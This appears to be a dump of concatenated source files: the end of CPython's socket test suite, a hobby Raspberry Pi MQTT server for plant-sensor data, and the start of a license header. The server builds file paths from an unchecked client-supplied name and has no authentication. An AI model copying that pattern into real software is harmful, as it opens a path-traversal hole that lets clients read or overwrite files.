nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
if not os.path.isfile("/proc/modules"):
return False
with open("/proc/modules") as f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# The is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
@unittest.skipUnless(thread, 'Threading required for this test.')
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertTrue(s.type & socket.SOCK_CLOEXEC)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
@unittest.skipUnless(hasattr(socket, "socketpair"),
"need socket.socketpair()")
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertTrue(s.type & socket.SOCK_NONBLOCK)
self.assertEqual(s.gettimeout(), timeout)
else:
self.assertFalse(s.type & socket.SOCK_NONBLOCK)
self.assertEqual(s.gettimeout(), None)
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(1)
self.checkNonblock(s, False)
s.setblocking(0)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(1)
self.checkNonblock(s, False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
# socket sharing is expected to work only for blocking socket
# since the internal python timout value isn't transfered.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10MB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = 2
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(support.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(support.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
def accept_conn(self):
self.serv.settimeout(self.TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run return either send()
# or sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = support.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(support.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=0.01) as sock, \
file as file:
meth = self.meth_from_sock(sock)
self.assertRaises(socket.timeout, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(support.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(support.TESTFN, 'rt') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(support.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(thread, 'Threading required for this test.')
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest, UDPTimeoutTest ]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
host.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import paho.mqtt.client as mqtt # Import mqtt
import paho.mqtt.publish as publish # Import mqtt
from os import path # Import the path function to check if a userdata file exists or not
import json # Used to read and write userdata
import sensors # Import the sensors.py file
import time # Import time
import threading # Import thread
# import RPi.GPIO as gpio # Import GPIO --> This will not be used in this case
serverAddress = "172.20.8.47" # IP address of the RPI
serverTo = "rpi/torpi" # From client to server stream
serverFrom = "rpi/fromrpi" # From server to client stream
serverName = "Host-RPI3B+" # Emily for short
maxPlants = 7 # Maximum number of plants the user can have
maxPlantName = 15 # Longest plant name the user can have
errCausingHash = "null" # If an error occurs, this is sent back to the client who caused the error for debug
kickHash = {} # Used to keep track of each client and the number of messages they have sent
markEjection = [] # Used to keep track of offending clients
monitorInterval = 15 # How often the server completes a cleanup routine to kick clients sending too many messages
msgThreshold = 15 # If the client sends more than this many messages in monitorInterval time, kick them
# ======================================================================
# Request Tag Functions---
# ======================================================================
# def REQ_plantSensorData
#
def REQ_plantSensorData(msg):
userpath = "userdata/" + msg["sender"] + ".json"
# Check for existing file
if (path.exists(userpath)):
try:
with open(userpath) as infile:
plants = json.load(infile)
# An error occured while reading plant information from the users's .json file
except:
# If the requesting client has no plant data, throw an error
operationError("ERR_noPlantDataToRequest", errCausingHash, msg["sender"])
return
# Get the data from the sensors
if (msg["payload"] == "all"): # the user requested all plant data
# For every sensor of every plant, return the data for each plant at a time
for plant in plants:
# Data for any given plant
dataForPlant = []
# Parse the json sensor names as a literal array
sensorsParsed = json.loads(plant["Sensors"])
for sensor in range(len(sensorsParsed)):
try:
sensorData = sensors.readSensor(int(sensorsParsed[sensor], 16))
except:
operationError("ERR_invalidPlantSensorID", errCausingHash, msg["sender"])
return
# If the sensor ID is invalid, throw an error
if (sensorData == "ERR_invalidPlantSensorID"):
operationError("ERR_invalidPlantSensorID", errCausingHash, msg["sender"])
return
# If the data was valid, save it
sensorData["plant"] = plant["Name"]
sensorData["sensor"] = sensorsParsed[sensor]
sensorData = str(sensorData).replace(":", "--")
dataForPlant = sensorData
# Otherwise, return the data
publishOutgoingResponse("0", serverName, msg["sender"], str(dataForPlant), "RES_plantSensorData")
# end: def REQ_plantSensorData
# ======================================================================
# def REQ_numPlants
#
def REQ_numPlants(msg):
# Make sure the user has plant data already
userpath = "userdata/" + msg["sender"] + ".json"
# Check for existing file
if (path.exists(userpath)):
try:
with open(userpath) as infile:
plants = json.load(infile)
# Send the client back the number of plants
publishOutgoingResponse("0", serverName, msg["sender"], str(len(plants)), "RES_numPlants")
except:
# If the requesting client has no plant data, throw an error
operationError("ERR_noPlantDataToRequest", "null", msg["sender"])
return
# end: def REQ_numPlants
# ======================================================================
# def REQ_plantInfoOnStartup
#
def REQ_plantInfoOnStartup(msg):
# Make sure the user has plant data already
userpath = "userdata/" + msg["sender"] + ".json"
# Check for existing file
if (path.exists(userpath)):
with open(userpath) as infile:
plants = json.load(infile)
# If the requesting client has no plant data, throw an error
else:
operationError("ERR_noPlantDataToRequest", "", msg["sender"])
return
# Get the specific plant to return
plantDataToSend = plants[int(msg["payload"])]
plantDataAsStr = json.dumps(plantDataToSend)
plantDataAsStr = plantDataAsStr.replace(":", "--")
# Return the data for a single plant
publishOutgoingResponse("0", serverName, msg["sender"], plantDataAsStr, "RES_plantInfoOnStartup")
# end: def REQ_plantInfoOnStartup
# ======================================================================
# def REQ_addNewPlant
#
def REQ_addNewPlant(msg):
# Init the path of the new or existing file
userpath = "userdata/" + msg["sender"] + ".json"
userdata = msg["payload"].split("--")
# Make sure the path exsits
if (path.exists(userpath)):
# First read in any existing data
try:
with open(userpath) as infile:
plants = json.load(infile)
except:
plants = []
# If the path doesn't exist create new data
else:
plants = []
# The user already has the maximum number of plants
if (len(plants) >= maxPlants):
operationError("ERR_tooManyPlants", errCausingHash, msg["sender"])
return
# The user already has a plant with this name
for i in range(len(plants)):
if (userdata[0] == plants[i]["Name"]):
operationError("ERR_plantNameTaken", errCausingHash, msg["sender"])
return
# Make sure the plant name isn't too long
if (len(userdata[0]) > maxPlantName):
operationError("ERR_plantNameTooLong", errCausingHash, msg["sender"])
return
# Init the data to save
plants.append({
"Name" : userdata[0],
"Sensors" : userdata[1]
})
# Save the data (this will create a new file if one does not already exist)
with open(userpath, "w") as outfile:
json.dump(plants, outfile)
# Print out what was saved
print("New plant added with data: " + msg["payload"] + ", for user: " + msg["sender"])
# end: def REQ_addNewPlant
# ======================================================================
# def REQ_deletePlant
#
def REQ_deletePlant(msg):
# Make sure the user has plant data already
userpath = "userdata/" + msg["sender"] + ".json"
# Check for existing file
if (path.exists(userpath)):
with open(userpath) as infile:
plants = json.load(infile)
# If the requesting client has no plant data, throw an error
else:
operationError("ERR_noPlantDataToRequest", errCausingHash, msg["sender"])
return
# Search for and remove the desired plant
for i in range(len(plants)):
# If the plant was found, delete it
if (plants[i]["Name"] == msg["payload"]):
del plants[i]
# Save the new plant data (any not deleted plants)
with open(userpath, "w") as outfile:
json.dump(plants, outfile)
return
# If the plant was not found, throw an error
if (i >= len(plants) - 1):
operationError("ERR_cannotDeletePlant", errCausingHash, msg["sender"])
# end: def REQ_deletePlant
# ======================================================================
# def REQ_editPlant
#
def REQ_editPlant(msg):
# Make sure the user has plant data already
userpath = "userdata/" + msg["sender"] + ".json"
# Get the name of the plant to be changed and the new data
plantToChange = msg["payload"].split(",")
oldName = plantToChange[0] # Old plant name, the plant to look for
newName = plantToChange[1] # New name for that plant
# Check for existing file
if (path.exists(userpath)):
with open(userpath) as infile:
plants = json.load(infile)
# If the requesting client has no plant data, throw an error
else:
operationError("ERR_noPlantDataToRequest", errCausingHash, msg["sender"])
return
# Make sure the user isn't renaming a plant to an already existing name
for i in range(len(plants)):
# If the names are equal, the user probably pressed "save" by accident, so don't give them an error
if (newName == oldName):
return
# If a different plant than the one being changed has the newName, throw an error
if (plants[i]["Name"] == newName):
operationError("ERR_plantNameTaken", errCausingHash, msg["sender"])
return
# Search for and change the desired plant
for i in range(len(plants)):
# If the plant was found, edit it accodingly
if (plants[i]["Name"] == oldName):
# If everything is good, change the name
plants[i]["Name"] = newName
# Save the new plant data (any not deleted plants)
with open(userpath, "w") as outfile:
json.dump(plants, outfile)
return
# If the plant was not found, throw an error
if (i >= len(plants) - 1):
operationError("ERR_cannotDeletePlant", errCausingHash, msg["sender"])
# end: def REQ_editPlant
# ======================================================================
# def connectionStatus
#
# Subscribes the RPI to the topic "rpi/to" which handles data from the
# iOS device to the RPI and the topic "rpi/from" which handles data from
# the RPI to the iOS
#
# Arguments--
#
# client: the client connecting
#
# userdata: the data from the user connecting
#
# flags:
#
# rc:
#
# Returns--
#
# None
#
def connectionStatus(client, userdata, flags, rc):
mqttClient.subscribe(serverTo)
mqttClient.subscribe(serverFrom)
# end: def connectionStatus
# ======================================================================
# def operationError
#
# Creates and throws an error if something is wrong with a request
#
# Arguments--
#
# error: the error to throw
#
# msg: the hash that created the error
#
# receiver: the client who should receiver the error
#
# Returns--
#
# None
def operationError(error, msg, receiver):
publishOutgoingResponse("0", serverName, receiver, msg, error)
# end: def operationError
# ======================================================================
# def publishOutgoingResponse
#
# Publish an outgoing message with correct formatting
#
# Arguments--
#
# msgID: the ID of the message being sent
#
# clientName: the name of the client sending the message
#
# payload: the contents of the message
#
# operation: the request or response
#
# Returns--
#
# None
#
def publishOutgoingResponse(msgID, sender, receiver, payload, operation):
newMsg = "ID:" + msgID + ";sender:" + sender + ";receiver:" + receiver + ";payload:" + payload + ";operation:" + operation
publish.single(serverFrom, newMsg, hostname = serverAddress)
# end: def publishMessage
# ======================================================================
# def monitorClients
#
# Monitors how many messages each client is sending and ejects clients
# sending too many messages
#
# Arguments--
#
# None
#
# Returns--
#
# None
#
def monitorClients():
while (True):
for i in globals()['kickHash']:
if (globals()['kickHash'][i] > msgThreshold):
# Disconnect the client
markEjection.append(i)
globals()['kickHash'] = {} # Prepare the kickHash for the next cleanup
time.sleep(monitorInterval)
# end: def monitorClients
x = threading.Thread(target=monitorClients)
x.start()
# ======================================================================
# def decodeIncomingRequest
#
# Decode a message recieved from the topic
#
# Arguments--
#
# client: the client connecting
#
# userdata: the data of the connected user
#
# msg: the message that came with the topic
#
# Returns--
#
# None
#
def decodeIncomingRequest(client, userdata, msg):
# Whenever a message is sent, complete the cleanup routine by kicking any previously offending clients
for client in markEjection:
publishOutgoingResponse("0", serverName, client, "none", "ERR_kickedForSpam")
globals()['markEjection'] = [] # Reset the eject list
# Decode the message
entireMsg = msg.payload.decode(encoding='UTF-8')
globals()['errCausingHash'] = entireMsg.replace(";", "|")
globals()['errCausingHash'] = globals()['errCausingHash'].replace(":", "--")
# Split the message into its elements
msgElements = entireMsg.split(";")
msgHash = {}
# Search through all the elements to make sure they are valid
for i in msgElements:
keyValue = i.split(":")
# Confirm there is one key and one value only
if (len(keyValue) > 2):
operationError("ERR_missingKeys", errCausingHash, msgHash["sender"])
return
elif (len(keyValue) < 2):
operationError("ERR_missingVals", errCausingHash, msgHash["sender"])
return
key = keyValue[0]
value = keyValue[1]
msgHash[key] = value
# Make sure there is the reqired number of elements in the hash
if (not (len(msgHash) == 5)):
operationError("ERR_hashLength", errCausingHash, msgHash["sender"])
return
# Check to see if the connecting client is already in kickHash
if (not msgHash["sender"] == serverName):
if (msgHash["sender"] in kickHash):
kickHash[msgHash["sender"]] += 1 # Increment the number of messages they have sent
else:
kickHash[msgHash["sender"]] = 1 # If the client did not already exist, add them
print(f">>MSG CLIENT: " + str(kickHash[msgHash["sender"]]))
# Make sure the message is not just a PUBACK (publish sent back) from the RPI host
if (not msgHash["sender"] == serverName):
# Hash to handle request tags
requestTagHash = {
"REQ_plantSensorData" : REQ_plantSensorData,
"REQ_numPlants" : REQ_numPlants,
"REQ_plantInfoOnStartup": REQ_plantInfoOnStartup,
"REQ_addNewPlant" : REQ_addNewPlant,
"REQ_deletePlant" : REQ_deletePlant,
"REQ_editPlant" : REQ_editPlant,
}
# Ignore errors about errors to prevent bouncing back
dropErr = {
"ERR_hashLength" : -1,
"ERR_missingVals" : -2,
"ERR_missingKeys" : -3,
"ERR_invalidOpTag" : -4,
"ERR_noPlantDataToRequest" : -5,
"ERR_tooManyPlants" : -6,
"ERR_cannotDeletePlant" : -7,
"ERR_invalidPlantSensorID" : -8,
}
# Figure out if the request is valid (is it in the hash above?) and call the associated function
if (msgHash["operation"] in requestTagHash):
requestTagHash[msgHash["operation"]](msgHash)
elif (msgHash["operation"] in dropErr):
print("New ERROR " + msgHash["operation"] + " with payload \"" + msgHash["payload"] + "\". Sender " + msgHash["sender"] + ", Receiver: " + msgHash["receiver"] + ", with ID " + msgHash["ID"])
return
else:
# If the tag is invalid, throw an error
operationError("ERR_invalidOpTag", errCausingHash, msgHash["sender"])
return
print("New operation " + msgHash["operation"] + " with payload \"" + msgHash["payload"] + "\". Sender " + msgHash["sender"] + ", Receiver: " + msgHash["receiver"] + ", with ID " + msgHash["ID"])
# end: def decodeIncomingRequest
# Instate Eclipse Paho as mqttClient
mqttClient = mqtt.Client(serverName)
# Set calling functions to mqttClient
mqttClient.on_connect = connectionStatus # Called when the RPI
mqttClient.on_message = decodeIncomingRequest # Called when a message is recieved
# Connect client to Server
mqttClient.connect(serverAddress)
# Monitor client activity forever
mqttClient.loop_forever()
|
HTTPgen.py
|
#!/usr/bin/env python2.7
# BSD 3-Clause License
#
# Copyright (c) 2018, Ondrej Holecek <ondrej at holecek dot eu>
# All rights reserved.
#
